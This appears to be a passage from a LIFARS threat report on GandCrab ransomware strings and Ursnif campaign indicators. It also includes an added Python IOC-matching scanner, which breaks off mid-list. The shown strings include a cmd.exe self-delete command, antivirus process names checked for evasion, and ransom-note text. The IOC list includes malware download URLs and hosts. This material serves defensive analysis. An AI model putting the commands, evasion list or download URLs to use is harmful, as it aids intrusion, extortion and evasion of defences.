"os_major" (length: 0xa)
"os_bit" (length: 0x8)
"ransom_id" (length: 0xa)
"hdd" (length: 0x4)
"ip" (length: 0x4)
"ransom_id=" (length: 0xc)
"SOFTWARE\keys_data\data" (length: 0x18)
"public" (length: 0x8)
"private" (length: 0x8)
"open" (length: 0x6)
"Keyboard Layout\Preload" (length: 0x18)
"00000419" (length: 0xa)
"/c timeout -c 5 & del "%s" /f /q" (length: 0x22)
"open" (length: 0x6)
"cmd.exe" (length: 0x8)
"pc_user" (length: 0x8)
"pc_name" (length: 0x8)
"pc_group" (length: 0xa)
"av" (length: 0x4)
"pc_lang" (length: 0x8)
"pc_keyb" (length: 0x8)
"os_major" (length: 0xa)
"os_bit" (length: 0x8)
"ransom_id" (length: 0xa)
"hdd" (length: 0x4)
"ip" (length: 0x4)
"&id=" (length: 0x6)
"&sub_id=" (length: 0xa)
"&version=" (length: 0xa)
"&action=call" (length: 0xe)
"%s/%s/%s/%s.%s" (length: 0x10)
"wp-content" (length: 0xc)
"static" (length: 0x8)
"content" (length: 0x8)
"includes" (length: 0xa)
"data" (length: 0x6)
"uploads" (length: 0x8)
"news" (length: 0x6)
"jpg" (length: 0x4)
"png" (length: 0x4)
"gif" (length: 0x4)
"bmp" (length: 0x4)
"im" (length: 0x4)
"de" (length: 0x4)
"ka" (length: 0x4)
"ke" (length: 0x4)
"am" (length: 0x4)
"so" (length: 0x4)
"fu" (length: 0x4)
"se" (length: 0x4)
"da" (length: 0x4)
"he" (length: 0x4)
"me" (length: 0x4)
"mo" (length: 0x4)
"th" (length: 0x4)
"zu" (length: 0x4)
"images" (length: 0x8)
"pictures" (length: 0xa)
"image" (length: 0x6)
"graphic" (length: 0x8)
"assets" (length: 0x8)
"pics" (length: 0x6)
"imgs" (length: 0x6)
"tmp" (length: 0x4)
"http://%s" (length: 0xa)
"POST" (length: 0x6)
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" (length: 0xc5)
"GET" (length: 0x4)
"HTTP/1.1" (length: 0xa)
"%s\%s-DECRYPT.txt" (length: 0x12)
"%s\KRAB-DECRYPT.txt" (length: 0x14)
"%s.KRAB" (length: 0x8)
"ntdll�dll" (length: 0xc)
"NtSetInformationFile" (length: 0x18)
"d9sktop.ini" (length: 0xe)
"autorun.inf" (length: 0xc)
"ntuser.dat" (length: 0xc)
"iconcache.db" (length: 0xe)
"bootsect.bak" (length: 0xe)
"boot.ini" (length: 0xa)
"ntuser.dat.log" (length: 0x10)
"thumbs.db" (length: 0xa)
"-DECRYPT.txt" (length: 0xe)
"-DECRYPT.html" (length: 0xe)
"%s-DECRYPT.html" (length: 0x10)
"%s-DECRYPT.txt" (length: 0x10)
"KRAB-DECRYPT.html" (length: 0x12)
"CRAB-DECRYPT.html" (length: 0x12)
"KRAB-DECRYPT.txt" (length: 0x12)
"CRAB-DECRYPT.txt" (length: 0x12)
"ntldr" (length: 0x6)
"NTDETECT.COM" (length: 0xe)
"Bootfont.bin" (length: 0xe)
"SQL" (length: 0x4)
"%s%x%x%x%x.lock" (length: 0x10)
"\ProgramData\" (length: 0xe)
"\IETldCache\" (length: 0xe)
"\Boot\" (length: 0x8)
"\Program Files\" (length: 0x10)
"\Tor Browser\" (length: 0xe)
"\All Users\" (length: 0xc)
"\Local Settings\" (length: 0x12)
"\Windows\" (length: 0xa)
"=" (length: 0x2)
"&" (length: 0x2)
"undefined" (length: 0xa)
"AVP.EXE" (length: 0x8)
"ekrn.exe" (length: 0xa)
"avgnt.exe" (length: 0xa)
"ashDisp.exe" (length: 0xc)
"NortonAntiBot.exe" (length: 0x12)
"Mcshield.exe" (length: 0xe)
"avengine.exe" (length: 0xe)
"cmdagent.exe" (length: 0xe)
"smc.exe" (length: 0x8)
"persfw.exe" (length: 0xc)
"pccpfw.exe" (length: 0xc)
"fsguiexe.exe" (length: 0xe)
"cfp.exe" (length: 0x8)
"msmpeng.exe" (length: 0xc)
"SYSTEM\CurrentControlSet\services\Tcpip\Parameters" (length: 0x34)
"WORKGROUP" (length: 0xa)
"Contro6 Panel\International" (length: 0x1e)
"LocaleName" (length: 0xc)
"Keyboard Layout\Preload" (length: 0x18)
"00000419" (length: 0xa)
"productName" (length: 0xc)
"SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion" (length: 0x3a)
"productName" (length: 0xc)
"error" (length: 0x6)
"x86" (length: 0x4)
"HARDWARE\DESCRIPTION\System\CentralProcessor\0" (length: 0x30)
"ProcessorNameString" (length: 0x14)
"Identifier" (length: 0xc)
"ntdll.dll" (length: 0xa)
"RtlComputeCrc32" (length: 0x10)
"UNKNOWN" (length: 0x8)
"NO_ROOT_DIR" (length: 0xc)
"REMOVABLE" (length: 0xa)
"FIXED" (length: 0x7)
"REMOTE" (length: 0x8)
"CDROM" (length: 0x7)
"RAMDISK" (length: 0x8)
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" (length: 0x1fc5)
"HTTP/1.1" (length: 0xa)
"ENCRYPTED BY GANDCRAB %s" (length: 0x1c)
"DEAR %s, " (length: 0xa)
"DEAR USER, " (length: 0xc)
"YOUR FILES ARE UNDER STRONG PROTECTION BY OUR SOFTWARE. IN ORDER TO RESTORE IT YOU MUST BUY DECRYPTOR" (length: 0x68)
"For further steps read %s-DECRYPT.%s that is located in every Mncrypted folder" (length: 0x4f)

IOCs associated with the Ursnif campaign

IP addresses:
46.173.219.104
46.29.167.73
89.223.28.184
109.234.38.152
176.32.33.171
185.120.58.13
185.228.234.159
185.228.234.5
193.187.172.169
209.141.58.88
213.226.124.245

Domains:
d49dv62iea39.email
d74yhvickie.band
fmarquisecale.com
g53lois51bruce.company
hkf98ua36ou.com
nuavclq20tony.com
pgarfielduozzelda.band
rz70tom99.band
veulalmffyy.company
wbfnjohanna.band
www.g53lois51bruce.company
www.nuavclq20tony.com
www.xvirginieyylj.city
xvirginieyylj.city
zgnoeliakatelynn.com

URLs:
hxxp://d49dv62iea39.email/
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.phpl=noos11.harz
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos12.harz
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos15.harz
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos1.harz
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos2harz
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdophp?l=noos2harz
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos4.harz
hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos7.harz
hxxp://d74yhvickie.band/
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?1=cubom13.jam
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom10.jam
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom10.jam.
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom[1-16].jam
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom13.jam
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom17.jam
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom8.jam
hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom9.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid14.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid1.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid2.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid3.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid4.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid5.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid6.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid7.jam
hxxp://fmarquisecale.com/xn102sp10zk/m10ps1-slx.php?l=ledid8.jam
hxxp://g53lois51bruce.company/
hxxp://g53lois51bruce.company/xap_102b-AZ1
hxxp://g53lois51bruce.company/xap_102b-AZ1/
hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php
hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex10.gas
hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex[1-15].gas
hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex15.gas
hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex4.gas
hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex7.gas
hxxp://hkf98ua36ou.com/
hxxp://hkf98ua36ou.com/xap_102b-AZ1
hxxp://hkf98ua36ou.com/xap_102b-az1/704e.php
hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?1adnaz8.gas
hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?l=adnaz19.gas
hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?l=adnaz4.gas
hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?l=adnaz5.ga
hxxp://hkf98ua36ou.com/xap_102b-az1/704e.php?l=adnaz5.gas
hxxp://hkf98ua36ou.com/xap_102b-az1/704e.php?l=adnaz8.gas
hxxp://hkf98ua36ou.com/xap_102b-AZ1/704e.php?l=adnaz8.gas
hxxp://nuavclq20tony.com/
hxxp://nuavclq20tony.com/xn102sp10zk
hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid12.jam
hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid13.jam
hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid4.jam
hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid5.jam
hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid7.jam
hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid8.jam
hxxp://nuavclq20tony.com/xn102sp10zk/m10ps1-slx.php?l=ledid9.jam
hxxp://pgarfielduozzelda.band/
hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php
hxxp://pgarfielduozzelda.band/xn102sp10zkm10ps1-slx.phpexop12.jam
hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop10.jam
hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop12.jam
hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop13.jam
hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop8.jam
hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop9.jam
hxxp://pgarfielduozzelda.band/xn102sp10zk/m10ps1-slx.php?l=exop9.jam@B8_944473A95__13691
hxxp://rz70tom99.band/
hxxp://rz70tom99.band/xap_102b-az1/704e.php
hxxp://rz70tom99.band/xap_102b-AZ1/704e.php
hxxp://rz70tom99.band/xap_102b-AZ1/704e.php?1=xorof4.gas
hxxp://rz70tom99.band/xap_102b-AZ1/704e.php?l=xorof3.gas
hxxp://rz70tom99.band/xap_102b-az1/704e.php?l=xorof4.gas
hxxp://rz70tom99.band/xap_102b-AZ1/704e.php?l=xorof4.gas
hxxps://g53lois51bruce.company/
hxxps://nuavclq20tony.com/
hxxps://pgarfielduozzelda.band/
hxxps://rz70tom99.band/
hxxps://rz70tom99.band/xap_102b-az1/704e.php?l=xorof4.gas
hxxps://rz70tom99.band/xap_102b-AZ1/704e.php?l=xorof4.gas
hxxps://xvirginieyylj.city/
hxxps://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw11.harz
hxxp://veulalmffyy.company/
hxxp://veulalmffyy.company/puewpxmasl/s
hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php
hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?
hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf13.harz
hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf2.harz
hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf4.harz
hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf5.harz
hxxp://veulalmffyy.company/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=sklimf9.harz
hxxp://veulalmffyy.company/puewpxmasl/XXX
hxxp://wbfnjohanna.band/xn102sp10zk
hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php
hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog2.jam
hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog3.jam
hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog4.jam
hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog5.jam
hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog6.jam
hxxp://wbfnjohanna.band/xn102sp10zk/m10ps1-slx.php?l=tdog7.jam
hxxp://xvirginieyylj.city/
hxxp://xvirginieyylj.city/puewpxmasl/
hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php
hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw10.harz
hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw11.harz
hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw3.harz
hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw5.harz
hxxp://xvirginieyylj.city/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=batyw9.harz
hxxp://zgnoeliakatelynn.com/
hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php
hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?cubom16.jam
hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?lcubom
hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom10.jam
hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom[1-16].jam hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom11.jam hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom16.jam hxxp://zgnoeliakatelynn.com/xn102sp10zk/m10ps1-slx.php?l=cubom9.jam Samples: 0090a5eb10e90e9dc8969e1d4ca370a24a81cacae7813f004c35c96b3d34ef5c 00a87f7662cac33aa1199e1d36b15d71064b093ffcadcf71ec19380d775323e1 01dc719df7ef8513ebdb85f1cd2bc4603b8873c56ce380f9d3607419f571c419 0344ec99e907790b9c1d851e1e07814f046d8b595b8b064d0214c1d5e5183616 0ab17567f4c1bbad33f8021384b8afc96ee02afef0e55dfe59563302d8d6aed0 0db384aa1bd02b3f983b8503879200558a2c44590a90f44087792ce0d00d43e9 12a05273cdf3182b9bf2208cce3180c72c15ebd784af771ab0a158369814b6d9 13f4f6bfa687c3b0a01c16f4c313bd10960d76258c2b97429b77a15b69870d1c 14a813a38243e7803b74495c2be94a34c7d702d11c416e0925c5e33e6720d3dd 1d57bb7ec42a9437e35b2f8a8d7d2bff6dc1615f6db64bbb8af481211561a83e 1dd20cdc8f64e052ffc7ff8aa3edcf0b487a03308b7855f55e62cffe58b89188 1e1509a6a58b807e396162f2ead1f67d361d2b663336a66b2493acd92bea9a2a 21057a60024538576afbc3ab4fa60b0dbaf447f3424f05430d58b0c5b3a11fa9 22286debebb3db5e95c654e0a03634347ec255a2489469c9f73093c3e923235b 26ae9013972716985d16a30b9bb67c763a0b9403855e81ed2dd3a5235188b635 281ebba397af5de8db77bb4b6413f88327c14d06a1f77b6b126c355a64554626 2b7ef4b46a5f23b8a50a3a219eaf6b87440c2882069292ec95e38c034aece31c 2d4690b8d373bb95561af26c44c4b3843d2e14280258bdf09d8b4972461f5b45 312a01c19348d4a48841f1e0c6b77605eeb146e9bdcf2886411a2d18f9985ae8 33672b3d477e75c8c1f9cb222a4fcab2184fec1fd9b98767e061aec7e576ad60 373b866d92ef04e1b5d5e9a9400b1c18e389aa3b6829c4f80bea9812013da78c 37c342b36a8c0b107ce510397a9b335711f0953cbbdbcdb41b88c50ad07c6bce 38262decdac6c7aa72450c399141d7c058f17698e017e3baa0b7b54298439546 3b155ad9f8b983c960de85b1e2cbf26e76b7b0a591520626a49ad8f00a35785b 3bfc794becbcc085e64125b3b7eb46f1fffc80bb93d2231790b57bc9bc97725b 3dd1c0ba9dc20f0d27e63e70563e8bdd8b5133510f09df6d59ccd9943143bdfb 244 Fifth Avenue, 
Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 34 3fa080a3b3bc2333173c8119b940016143a1d20abe80994499017f1e9e70b41a 45763a1bae98f75a15d5e0e8f7a2e0a0fb085d39989eb0193efa13124d98d35f 46c9ad9ac2d0ca987f094d27ba8643ef613f140d2a7e0d7738e603925ad9449d 486b52be2ef32efde11ebcc9dac6413a95b72167a0cfc5c323c114f7179f4b6b 4a3e65a9d0ec3daf38e9c81918c3971b95390599956874398482b13e20c536a1 4d6f73f7a470c95894b345d33e1852c29cf91476d27f3871546f09c8429a2c99 4e931eaad8790f1edddb72f0ea4a9b50ab3c93916f09b5b9659378328b97f3fb 4e9ea2399fe1d593a0a7d233e6f92bcae3ff521f3354cb5127ad8d31c9a26b7d 4eb6478ea45a6c78b641b282a7ff0508050044777c668df8ed959b06ba661abf 4ef7b518d42a8e0fc1f879dc175fbf1c7d0f0c0e1c402d63eef73db4bf27a895 4fc7c0491710340f62993fb62a94848e3c5935c7d9d3f950700bacf8fd56d29d 58da1463d41297ab73ff61354aa54e422e8f1889af499fc75f44ca7e9c6d7d58 5b43d8dbfc3084e19c4d56949a48d72a269aa804dcac0a48bae5e1aad77a5647 5d15ca9342abc08594f76d2ad16aae8058d0ed18038e1dadbcc0551bdad0760f 5efe82556278fcac1d9d662d3e1a0abe060f48b24537e2843c74532ee13150f9 5f5eb22a5cd351c63392156a865eec79361721cc56f7c7dcc9d1be8720308741 6065712d7439ad5478288ae075eb4e3a7b25f769983e0782f73091d9c66adec4 61cc4d1e5b08f5161d7b597b8231ac01e30ab39af2741c79ef0740febcaf2859 63058d4d1631ab9bd4bef4016384ef164e1a7e8fc083c4609d0a1d37f75a53de 6403adc739161960f95473477bbe4eca0812e35bf8b0510c4d221ce95348e4b1 6921ed58c5396697eb8dc3beb2f1c23641b7af30259a83b31d918b062bb649f3 6ac8a2f2c73bd7e77aa6f132a2300e8b04b8c675f23b74f9cd5892f9a14a11d3 6ffb1eeb01acb2760a1b1358fa7d30ab1eb06f45f4ff7b64f48a59fc4a795e93 7202707191fc9f702ca503aeed19332afb15b169d9c37c21767434501942695a 74477d34586f996af7d2c915315ca29edabbbe9fa0f28d6a96f9e7374d307d14 7475ee8bb92dfde99a385fbeb715d9dc3b6340c69cf9045aaee54a6ab26654f2 7650fda380fb569b1be96b605e799de2e5c683c2bff449333a34c10b1a85a613 77af4359a5c056aa2ab20ee2cdc4add00419bcb30371ab1107470a22c308b9bf 78e3f5ba4f4207b547dee306c3a6b9e282af662e74ef804363ebe2665c827465 
7dcc1f253a147a68a5abd44f83b71e820d2403aaa13552e08e009ea68967766e 84067c07cb3da2c063b9fa3b0a1b28e71133ab7cf8889745820fd2abcd422028 8495f62347ec3ac79ece995fde2327b08b96b11d50ccf6f7f6fbe189ea9e8ce2 8bdd831fa3c5d725724a2f1fd8ba1d806b1719acfa89d90b10b4121c018937c9 8d2e1ea4eec9578f4d4054bebb2d48ba06460c9b8b472128a8f0239e52ae2975 8f542cacbb8ed0c7f04d486a952504f64768a2c9c8e18645444416cf88a2490f 90d4ce9b2f662e296ec84442c81d7e333f09a8f0ec02877b9b8f8d0ea99bfcc5 92a89e6c942eef866662ccde64a1cfe400c7086c852f99a513ab448fce899911 93b2b31876ffc0391a5d0aa9524a8600009ba8d11b19d805a096365419f02938 95c056737ce3b7de42309b56fe596d857d52d6c7178f5b73f1baa07e0631a95f 962586a1754cc4ae1d3b2272995747eca7b2a2c3115022beb8d08238451849de 9639acbb1a74e968f42f74847df5b39e53b0b529a114f1c25a6cd96a2cd60b5d 9775c86c4e6183e906925d9686a0e4bedd6b3fcfded5ec86f57871919b195240 97e9afa9e21c07e71b802d99c7a41f462f9aad47a8324dd364dc307b20e0565b 9a0091c9222c189dd8dcccbded1e777a67d6fb5add08d960df6fbaf840c4e602 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected] 35 9e5e850d8150fcc67361620e85d0ee66ca5e63785ec9c6452d68eef7300af396 9ed51707c31f4a680222ec2ff45ade5f08e134e0975d1c3b1dadebfb3d90d90a 9fcfda8562185821cf3a6147565e87438f769c663bab23500f77433644c13a20 a0c95628b45f8c6206d0db547791b0ec7c86f9c53578c74af641181130ae42ec a30054ebac6ba39a70031aa8a84c04ba106354b5cb3af12deacc0c26152d25b3 a32f96b630d2d59b3977618d9fbc0516c40aa1868302aa32dbeca91bd4abb884 a3c172e12ebe284d809d31bc193b37061dca3e9566580a4eb4ea3040a0d97b77 a4ec868b4f4a578b97f498896a42f8882f345bd4f4cae3f6b29bbc0319279434 a634a2b1175c6cd20c7a1b5c88d8ec7ebd26df661fcd1f5b83187f06efd47382 a6f493975810828f203d7297c84678b90248a1be767aa13fe5837c57ef6b0a6d a81dbf05c60e71229e038aa267ba66ce1ea3ce890575d3f0eb58c79c2c57085e a8a4640cd5e39c8b96aa01f3ad7f2208fd71f76d4491ecd9cb73dd2e4e2ce27e ab37f3c2b6d280a1c573e54386023696eb03bdeb4dfb4af3051846f4b0cc060c abff796e1bc6d32c36d40c48542688797e72062db50bb3fa5ee870501868af69 
b65ddadd1f89643fcf8305c00b9db8ff9b0fbe3215e1670b5eb3d32c14e1fcaf b6a415bd6f3ea1e803afd3cf820f9e7815e8a9b38f865062a3a7e3d56acc9f68 b7d30b145b009083ac8683cfcd59e4d8769cbd305d1f321083bb3be2f17e2857 bfc272cd9aeb9cbb5ce595d1ab889174e1d4407ce3bdc3f0d9a1a7d1230493d6 c1291c0cf1b22ba9829a932b0a112dddc99a18f93a712e4db5fd8ab98082d063 c21ecee9b6ac835b87f5895febdf5e40362419b85122510905ac7c898625dbbc c668b0d251628f1be28b716e8584bf82bbf8ff09384d01c40755e333f0fdf89d cbe29f9b03b7da02e266c6650ed92fe46ba4ab9d1908bf0b6d55f599d58a7f39 cc5059f9db19483b1d4c5bbe3af86290dc5222fa359785a145cb7d742d3411aa cceb073cc5f696eb3b785490b708076b780f6d109d98c0173d1822d514751cf0 cd7f283a0766e0ea5f68c25eb1aeb01cd3b8e469d2ad9c586260398af36ad94d d93f1d423add887b3bf4d26fd3862e54bbc1c6007dae7f4114ef82f143635716 e0665789f79e5db45653d78373dfed3bdc231490f399257c83e06270f8308457 e1e277ddbb659a28150d4af6a6537cc74eb0044e90fdf83f5362bca85249900d e30bf61d0991b041bdb725847f67acba8c32e1ddce0539fa98ad2bf3cc4f79a4 e32601feb6e36035cd3ffc420d489c9ecb5999b65ee20dc07df021f8031646b1 e4a959684cd6ea7248dc4d2ad0d5df2790ff217685c2a341d242a85b5808d720 e92068587d6f3619f71575d4500bdee9af4511c662dc3c44857981e513d419ff e974c3f5b8aacbb599bc81407f6171dc702e3e3baa55fa53647a395c37f3eef1 eb15567067bcec7ce3d2cf34cddb654230d538c6dc03955d75bcb1b6b8fa8f11 f17abd9afb7abb84ebd75cd0ea12c7831a30e1226b48fd4314f9a5b64b29a567 f1d38bb02a5dea271fe7f8db50db348fac3887af26cc7be3054920c68227beaf f39d6a09ed5720e0d125438d3f1ef27b305be6d40974cf9d9131954b302d7203 f6b01cc5ec897a40684d53ad4e044750a5c1848293376e950fc3f35a28dd8bfc f70b95b502c3d55a4c8a8565f462239b2be3e9ecd90fdb4dfbcbf93c900e4156 f8ba5edc4be23a37178ff4b60bc7904e60df1f907996a8b1ac795a58db6214d4 f9e448fc3d9923187c3a4ca7e91c02f15ec4c4d30301ea91f0014b80db88d415 fb682f79427c475cfe2a02621b40faf4a7aefbe1eab900a83ebdfca5802856d0 fbad24ad8e25e4bd3b4e030a085f11caab6f068dc3c85edbb9fa0720c2c30708 fbc964a3439886b66a78c5351a15c68fe6ea41741d2b32c12cc9af23344e0eeb 244 Fifth Avenue, Suite 2035, New York, NY 10001 
LIFARS.com (212) 222-7061 [email protected] 36 fcbc470bdaf3fdcb0a40508d04beaff0e99087c151bb21c2889ad4f6cdcc20f3 fe7aa22e1b9b83661bbf120d6e54c68c8498df61aa76576ccd6eaaa7a7fd8ed2 244 Fifth Avenue, Suite 2035, New York, NY 10001 LIFARS.com (212) 222-7061 [email protected]
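The URL list above has a regular shape: every download server exposes one of three PHP endpoints (/puewpxmasl/suoepwxpamxapxlamslxdo.php, /xn102sp10zk/m10ps1-slx.php, /xap_102b-AZ1/704e.php) and takes a stage name of the form ?l=<word><number>.<harz|jam|gas>, with the report using cubom[1-16].jam as shorthand for a numeric range. The following is an added example, not code from the LIFARS report: it refangs a subset of the listed IOCs, expands the bracketed ranges into concrete URLs, and scans constructed proxy-log lines, flagging exact IOC hits separately from requests that only share the campaign's endpoint and stage-name pattern on an unlisted host. The path/query generalisation and the five-field log format (timestamp, client, method, URL, status) are this example's assumptions; the sample log lines are constructed, not taken from the report.

```python
import re
from urllib.parse import urlsplit

# Subset of the report's IOCs, copied as listed (defanged hxxp:// form).
REPORT_URLS = [
    "hxxp://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos12.harz",
    "hxxp://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom[1-16].jam",
    "hxxp://g53lois51bruce.company/xap_102b-AZ1/704e.php?l=xtex[1-15].gas",
    "hxxps://rz70tom99.band/xap_102b-AZ1/704e.php?l=xorof4.gas",
]
REPORT_DOMAINS = {"d49dv62iea39.email", "d74yhvickie.band", "g53lois51bruce.company",
                  "rz70tom99.band", "zgnoeliakatelynn.com", "xvirginieyylj.city"}
REPORT_IPS = {"46.173.219.104", "185.228.234.5", "209.141.58.88"}

# Generalisation of the three endpoint shapes seen in the URL list. This is an
# assumption of the example, derived from the listed URLs, not a rule the report states.
DOWNLOAD_PATH_RE = re.compile(
    r"^/(?:puewpxmasl/suoepwxpamxapxlamslxdo|xn102sp10zk/m10ps1-slx|xap_102b-az1/704e)\.php$",
    re.IGNORECASE,
)
STAGE_QUERY_RE = re.compile(r"^l=[a-z]+\d+\.(?:harz|jam|gas)$", re.IGNORECASE)
RANGE_RE = re.compile(r"\[(\d+)-(\d+)\]")


def refang(ioc):
    """hxxp:// -> http:// (and hxxps:// -> https://) so the IOC compares with a live URL."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", ioc, flags=re.IGNORECASE)


def expand_range(url):
    """Expand the report's '[lo-hi]' shorthand into every concrete URL it stands for."""
    m = RANGE_RE.search(url)
    if not m:
        return [url]
    lo, hi = int(m.group(1)), int(m.group(2))
    return [url[:m.start()] + str(n) + url[m.end():] for n in range(lo, hi + 1)]


def build_url_set(report_urls):
    """Refang, expand and lower-case the listed URLs for exact matching."""
    urls = set()
    for u in report_urls:
        for concrete in expand_range(refang(u)):
            urls.add(concrete.lower())
    return urls


KNOWN_URLS = build_url_set(REPORT_URLS)


def classify(url):
    """Return (verdict, reason) for one requested URL.

    'ioc'     - exact match with a listed URL, domain or IP
    'pattern' - unlisted host, but the path and stage name have the campaign's shape
    None      - nothing matched
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if url.lower() in KNOWN_URLS:
        return "ioc", "listed URL"
    if host in REPORT_DOMAINS or host in REPORT_IPS:
        return "ioc", "listed host " + host
    if DOWNLOAD_PATH_RE.match(parts.path) and (not parts.query or STAGE_QUERY_RE.match(parts.query)):
        return "pattern", "campaign download path on unlisted host " + host
    return None, ""


def scan_proxy_log(lines):
    """Scan 'timestamp client method url status' lines (constructed format for this example)."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # skip malformed records rather than raising on them
        ts, client, method, url, status = fields[:5]
        verdict, reason = classify(url)
        if verdict:
            hits.append({"ts": ts, "client": client, "url": url,
                         "verdict": verdict, "reason": reason})
    return hits


# Constructed log lines (not from the report): a listed URL, a range member, a listed
# domain with an unlisted path, a new host with the campaign path, a listed IP, one benign.
SAMPLE_LOG = [
    "2019-02-12T09:01:11Z 10.0.0.21 GET http://d49dv62iea39.email/puewpxmasl/suoepwxpamxapxlamslxdo.php?l=noos12.harz 200",
    "2019-02-12T09:01:40Z 10.0.0.21 GET http://d74yhvickie.band/xn102sp10zk/m10ps1-slx.php?l=cubom14.jam 200",
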